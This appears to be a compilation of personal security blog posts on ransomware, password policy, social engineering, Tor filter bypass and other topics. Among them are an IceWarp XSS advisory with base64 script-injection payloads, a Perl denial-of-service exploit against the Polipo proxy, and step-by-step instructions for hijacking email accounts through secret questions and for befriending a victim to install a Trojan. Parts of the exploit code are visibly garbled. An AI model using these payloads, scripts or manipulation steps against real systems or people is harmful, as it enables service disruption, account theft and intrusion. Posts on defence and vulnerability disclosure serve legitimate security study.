CTB-Locker Infection


CTB (Crypto TOR BITCOIN) locker is the next generation of the shutdown Crypto locker Trojan.  What kind of Trojan is it ? Well to explain that I will have to ask another question , ever heard of Ransomware ? No? Let me explain, a Ransomware is a kind of Trojan which locks your computer and asks for some xyz  amount to unlock your computer. In other words a ransomware makes your computer its hostage and demands for a ransom.

Lets talk about the background of Ransomwares and how and where they are being made. Russian and Ukrainian cyber underground market is quite infamous. What it is running on , is , the services that they provide to criminals or whom ever is willing to pay. This started off with Spam bots used for spamming. Think, if you have to pay 1 million dollars to a company for your Ad campaign, then why not pay 1 thousand dollars to a spam bot master and get the same results. Botnets were next as they became the next biggest service in the Russian underground. If you wanted to DOS some one or DDOS some one you could just rent out a Botnet for X amount of money and do your thing, make newspaper headlines and then return, or you could buy it from the person selling the Botnet.

People in the Russian Underground market have been giving services for Ransomware, until the recent Cryptolocker crackdown. Now they have come up with a new Ransomware, The  CTB Locker. Which is a very nasty Trojan. The encryption it uses to encrypt all the files in any infected computer, is, Elliptic Curve Encryption which means , if I put it simply, its impossible to decrypt without the proper decryption Key.

How does it infect the user’s computer (High level , semi technical steps):

  1. The User gets an email containing a zip file.
  2. Once the Zip file is opened it executes a dropper file. Typically droppers are the programs that connect remotely to the hacker’s controlled server and download  and install the Trojan onto the user’s computer.
  3. The CTB-Locker , once executed, locks the computer and encrypts all the files.
  4. The User is given 96 hours to pay the ransom.
  5. Once the ransom is payed, the decryption key is sent.

More Technical details can be found here.

In our line of work i-e Cyber Security , we usually hear that humans are the weakest link in the security chain. As consultants we visit many clients and guess what they say when we ask them to install an antivirus or anti-malware solution on their computers. They say : “This is not important. I have nothing stored on my computer. If some hacker does get into my computer, he would find nothing.”

This is a typical reaction but what I tell them is that nowadays your computer is your responsibility. The phrase Harboring a fugitive should be applied here, if we map the real world to Cyber world. You are deliberately leaving your computer vulnerable and if your computer gets infected and becomes a part of a botnet and you take down some Government organization and when they come after you because they would have detected your IP. What would you say then?

Nowadays there is a threat of Cyberwar , Cyber espionage , APTs etc. When you connect your computer to the network or the internet, it is your responsibility to keep your computer from getting hacked.

That said, lets continue with how to protect from CTB Locker.

  1. Do not accept any file from an email sent by an unknown person, even if it says : “my_private_pics.zip”.
  2. Even if the email is from a person you know, do not open the attachment unless you confirm that it is really him, who sent the email.
  3. Keep you computer updated with all the latest patches. The applications you use, such as Java , Adobe , Winzip , Winrar etc, should be the latest versions.
  4. Your computer should have Antivirus (AV) and Firewall protection at all times. If you do not want to pay for an antivirus then go for AVAST.
  5. Install an anti-malware (AM) program  such as Spybot or Malwarebyte.

This would keep you safe from 97% of the attacks but if you choose to disable the AV and the AM to check the my_private_pics.zip then the damage to your computer will be total human ERROR.




How current Strong Password Policy is Wrong

KeepCalmLongPasswords-476x636This is what nowadays every Security Consultant out there is saying. Which is not all wrong , strong passwords allow a person to protect himself from being hacked. Passwords like abc123 and aaaa or apple , orange ,mango or any other fruit you might think of , are bad passwords.

Nowadays Companies ask for a passwords greater then 8 characters , Alphanumeric , First character Capital , etc etc . Now this is a great way to force a person to create strong passwords and is a good thing.


It is also not a good thing. Every company who is making a UI nowadays, is focusing on usability , meaning ease of use and remember.

Take Tablets for instance , our parents who have never used a computer are more happy with Tablets then computers and even our children are happy with tablets and touch devices. Why is that !? This is because its easy to use and you remember all the steps that you have to perform to, for instance , run a game or any other app or change the settings.

Nowadays , one person has thousands of accounts , Email , Social Networks , Job Portals , Online Bank Account credentials etc. Now , the Security consultant says that all the passwords should be different. And this is how the person feels

Frustrated UserThe algorithms used to check the strong and weak password are simple , they usually do not check the content of the password , they only check that password should be 8 characters and alphanumeric etc etc . The user has to remember all the passwords to all the accounts and all the passwords are different. That becomes a mess and very tiring.

I talked about the content of the passwords , that it is not checked , now lets see an example of how passwords on a windows machine connected to the Domain having all those rules can be bypassed.

I set a password 123456 and the system gives an error that it is not compliant to with the policy set by Domain. So then I try abcd12345 , it gives me the same error :( . Again, I try  a password qwert , it still gives an error.  I say ok fine , then I try Abcdqwert , it gives an error again. Now I am frustrated what I need is a number and a symbol , so i try Abcd@12345$ and  BOOM!!! The Password is accepted and now my life is so easy and I am super happy.

Then comes a hacker who wants to get into my system. he tries all the easy passwords but some how he discovers the policy that one character should be Capital , more then 8 characters etc etc. After a little while he tries the combination and HE IS IN !!! I am pwned !! :(

These policies are made to force a user to create a hard to hack password but what people do not get is the HUMAN factor. Any one who wants instant access to the account shouldn’t have to think about the password and then take  30 seconds just to type it. No one wants that and because of that we see passwords like 00000 , 1234567890 etc. Also nowadays every body is using their smart phones , and for a user with an alpha numeric hard password , its even harder to keep on typing the password again and again.

This is how the Strong Password Policy through out the world is wrong for the normal user who just has to connect for an email. I am not saying that passwords should be so easy that a baby could crack them but it shouldn’t be so hard.  Unless and until the content is checked in the passwords , the length , alphanumeric , capital/small etc wont work at all.


ICEWARP Multiple Clients, Persistent Cross Site Scripting (XSS)

Original Advisory : IceWarp Cross site Scripting

Video :

While going through the Icewarp client I found that  it is possible to inject malicious HTML Element tags into the email and cause a Cross site Scripting (XSS) payload to be executed.

The versions that I tested on, were  :

  • (2014-01-25) x64  (http://demo.icewarp.com/)
  • 10.3.4

The details about the POC are as follows :

It was observed that the ICEWARP Client Version 10.3.4 is vulnerable to <embed> tag as well as <object> tag.  Any attacker can create a specially crafted message and inject it into the Signature and as soon as the signature is loaded it will execute the XSS payload.

The Latest ICEWARP Client version 11.0.0 was tested on ICEWARP’s own website : demo.icewarp.com and was observed that it filters the <embed> tag but does not filter the <object> tag thus allowing the injection of malicious payload into the Signature portion and as soon as the signature is selected , it executes the payload. On further testing it was found that the vulnerability found in this version  can not qualify as a complete persistent vulnerability but in order to attack one has to use social engineering for the person to paste and execute.

Once the XSS payload was embedded , it always executed when the compose email was clicked but once the email was saved as draft , the payload disappeared.  It was noticable that in the signature box when we embedded ><script>alert(1);</script> , it got filtered immediately and never carried to the compose email but with Embed and Object tag it did execute on the compose email level.

Proof Of Concept
For Version: ICEWARP 11.0.0

&gt;<object data=”data:text/html;base64,PC9zY3JpcHQ+PGltZyBzcmM9Ing6eCIgb25lcnJvcj0iYWxlcnQoU3RyaW5nLmZyb21DaGFyQ29kZSg4OCwxMTUsMTE1KSkiIC8+”></object>&gt;

&gt;<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>&gt;


For Version: ICEWARP 10.3.4

<EMBED SRC=”data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==” type=”image/svg+xml” AllowScriptAccess=”always”></EMBED>

Social Network Information Harvesting (SNIH)

Social Networks ! For those people who do not know about the social network , what it is and what this blog post is all about , well , here is a quick introduction.

Social Network is


 People share their personal or business information freely on these websites. Though the privacy policy is pretty customizable and one can exactly show what one wants and hide what one does not want people to see. Despite of all the security and the privacy , information can get leaked. Many of these social networks constantly change their privacy policies and at one point when u upload a picture it is automatically set to your privacy settings and at another time , its public for the world to see, You constantly have to check again and again whether the privacy of the material is public or not. For example: We performed a controlled check through Facebook to prove our theory and what happened was that most of our friend’s profile pictures were public and when we contacted them , so they were all saying the exact same thing that the last picture they uploaded was private and now this one became public automatically when they uploaded it.

The main point of this discussion is not to find flaws in social networking websites but it is that security gaps are inevitable and all of our information is on these giant networks and for any reason if the information gets leaked , then you are at a loss .Now this is a great thing for Spammers , who harvest email addresses and other personal information.

Social Network Information Harvesting is basically defined as gathering information about people ,  available on the these social networks.   Social Network Information Harvesting can be a service for different kinds of people. Law Enforcement , Criminals , Spammers , Hackers , Intelligence.

SNIH can be applied in many scenarios and the repercussions of this can be quite serious, not for the implementers but the victims.

SNIH Scenario: [The Scenario is based on Facebook]

Usually what SMIH implementers do is that they create a small game or an application for the users to play or access on the Facebook. Most of the applications ask for permissions like email , statuses , friendlist etc. Now if it is a legitimate application then its a blessing but if it is a malicious one then you can say good bye to any privacy set by the user or the Social Network.

Now the information gathered or harvested can be used to find trends for analysis. This analysis is useful to Law Enforcement Agencies. If personal statuses are harvested then one can determine the tendencies in a person. Similarly If people with malicious intent get hold of this information then , the question arises that except for the obvious , Email Spamming , Harvested pictures selling and buying , Personal information Stealing , cell phone numbers harvesting  , what else can they do? Well this takes us to our second Scenario ..

SNIH Scenario 2 : [Disclaimer : This Information is for Educational Purposes. We will not be held responsible for any misuse of this information]

In this scenario we will see an attack that can be carried out by hackers against the innocent users. Though due to two factor authentication this attack might not work but most of us do not opt for two factor authentication.

The attack is on some user’s email address. Usually when we goto forget your password , the system asks us a secret question , which we have to answer in order to reset our password. Now if the hacker goes to some targeted user’s email and does the above mentioned procedure and for example the secret question is : “my favorite pet’s name”. Keep in mind that this account was made some years back and the person doesn’t even remember the question he or she kept , let alone the answer. Now comes the part where a little social engineering would help alot. The attacker goes on Facebook and if he or she knows the person who is targeted then its a walk in the park , as most of the user’s information is shown on his or her’s profile page or home page ,  but in this case he would have to ask him or her for the answer. Now if the person is a stranger , what the attacker has to do is to add the target user and start a conversation with him or her and between the chat , after a day or so , he can casually ask about pets and other stuff and then slowly ask : “I just bought a dog , what name should I give it”  and most probably in the user’s mind , in his subconscious , there is an 80% chance that he or she would tell you the same name. Once the attacker gets the hold of the answer , he just has to go to the email provider’s account and enter the answer and BOOM ! He is in !

Now what exactly happened was that the attacker used the information available on one social network against another network. The example above requires a little bit of social engineering but usually the questions are ” my aunt’s name” etc and that can easily be extracted from the information provided by the user on his profile.

To conclude , it is safe to say that Social Network Information Harvesting is wrong because it doesn’t matter if the law enforcement agencies use it or any other people with malicious intent use it , the point is that the user doesn’t know that the information is being harvested. This is in itself a crime whether Law Enforcement is using it or any other person is.












Psychological Warfare

Human Beings are stupid by default ! Human Stupidity never fails to amaze any one. We do very very stupid things , unknowingly of-course. This article is about how hackers or any one can tap into the human mind and take advantage of it in every way possible , usually called exploitation. This is either taught or some have this talent by birth for example people like Kevin Mitnick.

Before writing this blog post I just read a tweet on my Twitter Bot that “… do not worry about the Facebook cancellation email” , usually sent by hackers , to fool the innocent Facebook users in giving off their username/password to the hacker. It kept me thinking that why does this happen , why do people fall prey to such scams ! Even if they are technical or not ,they fall for it.Why does this happen?

For an introduction, I would like to say that usually this happens because the hackers know your weaknesses and by you  I mean every body. Hackers exploit these weaknesses to gain username/passwords and other information , usually called Social Engineering ! This talent can be weaponized and used to overthrow governments , start wars , financial gain etc. Once this talent is weaponized and used , it is called Psychological Warfare.

Psychological Warfare is actually mind games on steroids ! The applications and scope of Psychological warfare is broader to an exponential level.  Now I would tell you the process of psychological warfare used by hackers , a shopkeeper , Governments , Military etc .

Exploiting Human Selfishness

Human beings are very selfish ! Once a great man , who is my teacher as well as a very good friend argued that human beings are very selfish ! They do nothing selflessly and I was against the argument and gave many valid points as loving my family or my parents , giving stuff in charity etc so how is it not a selfless act , I don’t get any thing in return. He smiled and said , doing charity helps your conscience to be at peace. You love your parents because it gives you satisfaction. You don’t do any thing that doesn’t give you satisfaction, hence its selfish at some level. Well my point being is that human beings are selfish.  Every one has created his/her world around him/her and they just want to gain any thing and every thing from it.

Coming back to the topic , to how this is exploited. A simple example , every one likes free stuff , a hacker throws a USB flash disk on your door step or in your lawn , one would definitely pick it up and bring it home, well from a hacker’s perspective , any virus lurking in the usb will be executed and the computer would get infected and the usernames and passwords for your facebook , yahoo , hotmail etc would fly off to the hacker. Now in the second example as I mentioned earlier , the current scam for facebook cancellation message in the inbox . Why is everybody clicking on the link and getting hacked? Now here is a thought process that would start in my mind if I didn’t know about this , as soon as I would get this message I would say ” Niaah dude , its so fake ! ” and close the message window. Then after an hour or so I would think , what if the message was legit ! I mean what ever any one is saying , they didn’t get this message , I did!!! My Facebook account would be deleted , and I would be in loss ! The hell with it , I just have to goto the link and get it over with. After that I go onto the link and get hacked happily , but  who cares  atleast I saved my account from cancellation , so what if I got hacked but at least it would not get cancelled.

I hope my dear readers got the Idea !

Exploiting The Human Ego

You must have heard the sentence , ” I am right !! “! Me , Me , Me , I don’t care who you are and what your saying , I am right 100 percent. You must have seen your Bosses , Elder siblings , Teachers  etc , giving these statements. Now what is the best way to turn a no to a yes , in a Boss’s case ? You say : “Sir you are the best boss ever , what ever you say is right but if , though I don’t know much compared to you. Your knowledge is much more , but if you could accept blah blah blah , it would be great. I so want your input in this blah blah ! With out your input this blah blah is nothing. Please accept this !! ” There is a 80 Percent chance , No would change to a Maybe and 60 percent chance that No would change into a YES !!! Every one loves an Ego boost !

Hacking an account using social engineering and this technique.

Phase 1 :

Chat with your victim , for a while , and find a common subject. Once that is done , start the conversation about any controversial thing but never start giving the comments , for example : say .. ” I don’t know what this country is coming to , or what this school is coming to ! ” If the guy is a musician , say something that there aren’t many bands in the school and the whole music scene is getting destroyed and I think your band is the best there is ! The word flattery should come to mind  !  and then you will notice the guy would start giving his comments, because every one has problems , no one is happy with what he has . Just listen to what he says and just say :” Yeh!  man exactly ” etc ..

Phase 2 :

Take his email address , skype etc and him up ! Befriend him to a point where he starts trusting you. Then once done start the social engineering attacks. Install a Trojan onto his pc , and the list goes on !!

See how a little ego boost helped you gain valuable information. The scope of this blog is restricted to the hacker attacks. This can very easily be applied in real world , with real problems.

Intercepting and Messing with the Thought Process

Every one has his own thought process. If you say A in a room of  three people, all three people sitting in the room will start thinking of some thing different. The point is to make them think the same thing as to what you are thinking. This is usually achieved when one doesn’t give time to think and bombards ones own thoughts onto the people listening.

When ever a group of people come into a room , or a classroom , they have their own thoughts . Naturally the human brain is in defensive state and the people in the room do not grasp or accept at first, what the teacher is saying. The key is to get to their level and talk about some thing of interest. Human mind has a vulnerability ! To explain that I would give an example : If two people are sitting in a room and a third person is telling his point of view about A Topic , the other two wont accept at first , but ass soon as he finds a common ground , say C , now they talk about C for 10 minutes. The brain naturally put its guard down , and the weakness is that after that every one would agree on Topic A and also any other Topic !!! So one has to make a common base, the rest is all easy.

The second way to mess with the thought process is not to be that desperate to convince ! Once that happens , if any one listens to what you say , no matter how absurd , will first refute the logic but when they will notice that the argument that you are giving is suggestive but not desperate , they will accept it eventually ! Human mind requires time to process the input.

Exploiting the Lack of Concentration

Every one loves their own thing. For example if one person likes reading love stories , he/she would have zero concentration if they read or are forced to read a sci-fi story. Now this is the thing that the hackers exploit . For example for an English professor , if there is no poetry then its  useless. Now if she gets an inbox message by say the hacker , posing that he is from Facebook etc and the message is so long , with authentic logos and every thing ofcourse  , she would skip every thing and goto the end ,where there would be a link to the hacker’s page and boom , the English professor got , as they say “pwned!”

Lack of concentration is a major factor for these attacks to be so successful.

These were some examples of the Human Weaknesses that are exploited during a Psychological Warfare.  I did not mention how to over throw governments etc because for that I would have to write a whole book ! As this blog is related to Hacking and Security thus I had to stay in scope.

The Cyber War !

Cyber war , a very big word , but some how doesn’t seem so big. Let me first give an introduction to what a Cyber War really is. The introduction is divided into two parts , General perception & Reality !

General Perception :

Most of the people in security field know what cyber war is , the general perception is the perception of a cyber war amongst non technical and non security folks ! In general when ever Cyber is added to any word or any sentence,  the impact that it causes to the the listener’s mind is that “Wow ! what a cool name ! “. It doesn’t matter how critical the sentence or the word is , most people don’t take it seriously and the thought that runs in their minds is “Yeah right, this is kids stuff ! “For example , Cyber Bullying , although the impact in reality is very high but there weren’t any laws against it until recently. People used to think , what the hell cyber space is a joke. Its for children , having fun and messing around.

Similarly if people hear about Cyber War any where , they just don’t take it seriously. In their minds they are like , “Cyber War , huh ? What is that ? What can a Cyber War do to me or my country !? ” , because according to them the definition of a cyber war is just a bunch of hackers who don’t have any social life , attacking web sites of other countries and defacing their webpages and then boasting about it , online or amongst friends.

Then these people watch movies like “Die Hard 4.0” and start thinking about the whole concept as just pure entertainment. Thus destroying the slightest spec of seriousness of the word in their minds.

Reality :

In reality Cyber War is a kind of war that starts in the Cyber Space , followed by air & ground attacks , which are pretty real. As in the current age , where cloud computing is the next best thing. Where next generation network technology is in its adolescent phase , where every thing is controlled through a micro chip, or to simplify it  , every thing is computerized. Nuclear Facilities , Hospitals , Industries , Military defense , Electricity etc are all controlled virtually ! I give the example of the movie “Die Hard 4.0” again , though I am not infatuated with this movie but the concept of Firesale is pretty accurate and as this blog is a reference for the Security people as well as a source of information for non technical people thus giving an example of a movie is better then explaining the whole science ! To sum it up , as every thing is automated and computerized thus attacking the systems on a virtual level and bringing them down and as the country gets crippled , its just a matter of walking and claiming it for oneself .

Ok!  Enough with the introduction now lets make things interesting .  Lets start with Stuxnet!! Stuxnet is a very sophisticated cyber weapon created by the US & Israel  against Iranian nuclear facilities. According to the current press , it caused serious damage to the nuclear plan of Iran. Then the appearance of Duqu Malware which was the successor of Stuxnet. Duqu is quite different from Stuxnet, it has a modular structure like Stuxnet but it isn’t equipped with modules for SCADA systems attack. It is only able to steal information from the host system.In recent years China has come on the maps , as a threat to cyber defense. Google in 2010  blamed china for conducting very sophisticated attacks against the Google’s servers.Recent Anonymous attacks against US as well as other countries is also worth mentioning. Wikileaks is also an important part of whats happening in the cyber world.

As Cyber War is the new trend , thus it is very hard to distinguish between cyber criminals and cyber warriors or cyber soldiers. Cyber Armies are being created with full government backing in many countries. As now Cyber space is considered to be a zone which has the same level of importance as the other zones of potential attacks for example Land , Sea , Air !

A full scale Cyber War resembles a Cold War , where you don’t see much activity as during a normal war but , has the power to break down USSR all over again !!!!

Bypass Online Filter Restriction

Hello again !

Disclaimer: All the material shown on this blog is for educational purposes ! We would not be held responsible for any illegal use of the material by any one !

Usually what happens is that people want to visit a website , which is legit , but some how it is listed in the document given to a naive network administrator and you want to download important stuff from it but what the hell , ITS BLOCKED !!!!!!!!  Your boss , teacher or any person whom you report to , doesn’t want hear stuff about BLOCKED SITES !! Its totally lame to them because they want results and you didn’t deliver. This is a very normal problem faced by many employees , students , etc.

First of all you would have to know a little about “Tunnel” . For that please check out my post about Tunneling because your concept of how tunneling works should be very clear. Today I would tell you how one can bypass these filters.

Tor stands for The Onion Router. This was at first created by the US Naval Research Laboratory a long time ago but then was handed over to the people for commercial use ! Though alot of funding is still coming from the US Govt, and alot of other parties. Which is a pretty good thing because TOR was initially designed for anonymity. The goal was that the users would be anonymous over the internet , thus becoming less of a target for the hackers but back then ” Drive By Malware/Exploits were not in mind or yet discovered.

In this blog I would cover the bypassing of filters so anonymity is not the main focus.Ok  how it works is that first you goto the link and download the Vidalia Bundle . Then once downloaded, install the software and all its components.

After installation run the Vidalia executable. Wait for its icon on the tray of the taskbar, to  the right, to become Green. Once that is done , goto the browser’s network option and add following values in the coinciding variables fields :

Proxy Address :

Proxy Port : 8118

Ok now save the settings and get out of the options/settings by clicking on OK !

Now your good to go ! To check whether the proxy is working or not goto : What is my IP (dot) com and see your IP Address. For cross checking whether the proxy is working or not , before adding the proxy settings to your browser goto the above mentioned website and note your IP Address and then compare it with the latter!

Enjoy ! If for instance your ISP or Administrator is smart enough to some how block the tor network, goto the TOR control panel and the click the settings button and then goto the netwok tab, it would be something like this :

If you use a proxy to access the internet , usually which is the case in Universities and Offices so this is the option to give proxy to TOR:

There are a few other techniques you could use to bypass the filters , but this one is by far the best.


Polipo Proxy Server Denial Of Service

Polipo is a proxy server that is used with TOR (The onion router) vidalia bundle.If we speak in a very abstract and non technical manner then we can say that Polipo routes user’s browser traffic to the tor network. The user has to just give the port number (8118 in case of TOR).

The software’s download page and the exploit code  is as follows:

Disclaimer: [This code is for Educational Purposes , I would Not be
responsible for any misuse of this code]
# Exploit Title: [POLIPO Denial Of Service]
# Date: [10/05/10]
# Author: [Usman Saeed]
# Software Link:[http://www.pps.jussieu.fr/~jch/software/polipo/]
# Version: []
# Tested on: [Windows 7 Home]
# CVE : [if exists]
# Code : [exploit code]

[*] Download Page :http://www.pps.jussieu.fr/~jch/software/polipo/
[*] Attack type : Remote
[*] Patch Status : Unpatched
[*] Description  : By sending a crafted POST/PUT request to the server,
 the proxy server crashes !
[*] Exploitation :

# POLIPO Denial Of Service
# Disclaimer:
# [This code is for Educational Purposes , I would Not be responsible
for any misuse of this code]
# Author: Usman Saeed
# Company: Xc0re Security Research Group
# Website: http://www.xc0re.net
# DATE: [30/09/11]

$host = $ARGV[0];
$PORT = $ARGV[1];

$evil = "PUT / HTTP/1.1rn".

use IO::Socket::INET;
if (! defined $ARGV[0])
print "+========================================================+n";
print "+ Program [POLIPO Denial Of Service]             +n";
print "+ Author [Usman Saeed]                                   +n";
print "+ Company [Xc0re Security Research Group]                +n";
print "+ DATE: [30/09/11]                                       +n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +n";
print "+ I would Not be responsible for any misuse of this code]+n";
print "+========================================================+n";


$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr  => $host ,
PeerPort  => $PORT) || die "Cant connect to $host!";
print "+========================================================+n";
print "+ Program [POLIPO Denial Of Service]             +n";
print "+ Author [Usman Saeed]                                   +n";
print "+ Company [Xc0re Security Research Group]                +n";
print "+ DATE: [30/09/11]                                       +n";
print "+ Usage :perl sploit.pl webserversip wbsvrport           +n";
print "+ Disclaimer: [This code is for Educational Purposes ,   +n";
print "+ I would Not be responsible for any misuse of this code]+n";
print "+========================================================+n";

print "n";

print "[*] Initializingn";


print "[*] Sendin evil Packet Buhahahahaha n";

send ($sock , $evil , 0);
print "[*] Crashed  n";
$res = recv($sock,$response,1024,0);
print $response;



Gatecrashing the Google+ Launch Party

[ Disclaimer: All the material shown on this website is for educational purposes ! We would not be held responsible for any illegal use of the material by any one ! ]

Google+ the new buzz in town !! I see every one on Facebook , commenting about Google+. What is Google+ ? Well it is a social networking project by Google. It has alot of very nice features. Though its not mature enough but still the limited release is very nice. As it is a limited version so even if you Invite some one , they would go up on the page and it would not let you get in . A message saying that the limit has been exceeded.

Today Mr. Usman Ahmed and Mr. Ali Raza Khuwaja  , friends of mine  who are  Penetration Testers working with me , found a work around for inviting people for sure. The fun thing is that it has a 100% success rate uptil now.

The bug found , basically takes advantage of the Circles feature. If you directly send the invite , their would be a problem but if you goto your Home page and in your update section Write any update and just beneath it is an option for adding a Circle (group) to whom the update would be visible to. Write the email address of the Gmail person  as a Circle and post it.

After a while your friend would receive a mail saying:

<< Update on Google+ >>
[Hyper link to Google+] ==>  View or comment on <<Your Name>> post »
The Google+ project is currently working out all the kinks with a small group of testers. If you’re not able to access Google+, please check again soon.

Just click on the hyperlink and your in.

Peace !!!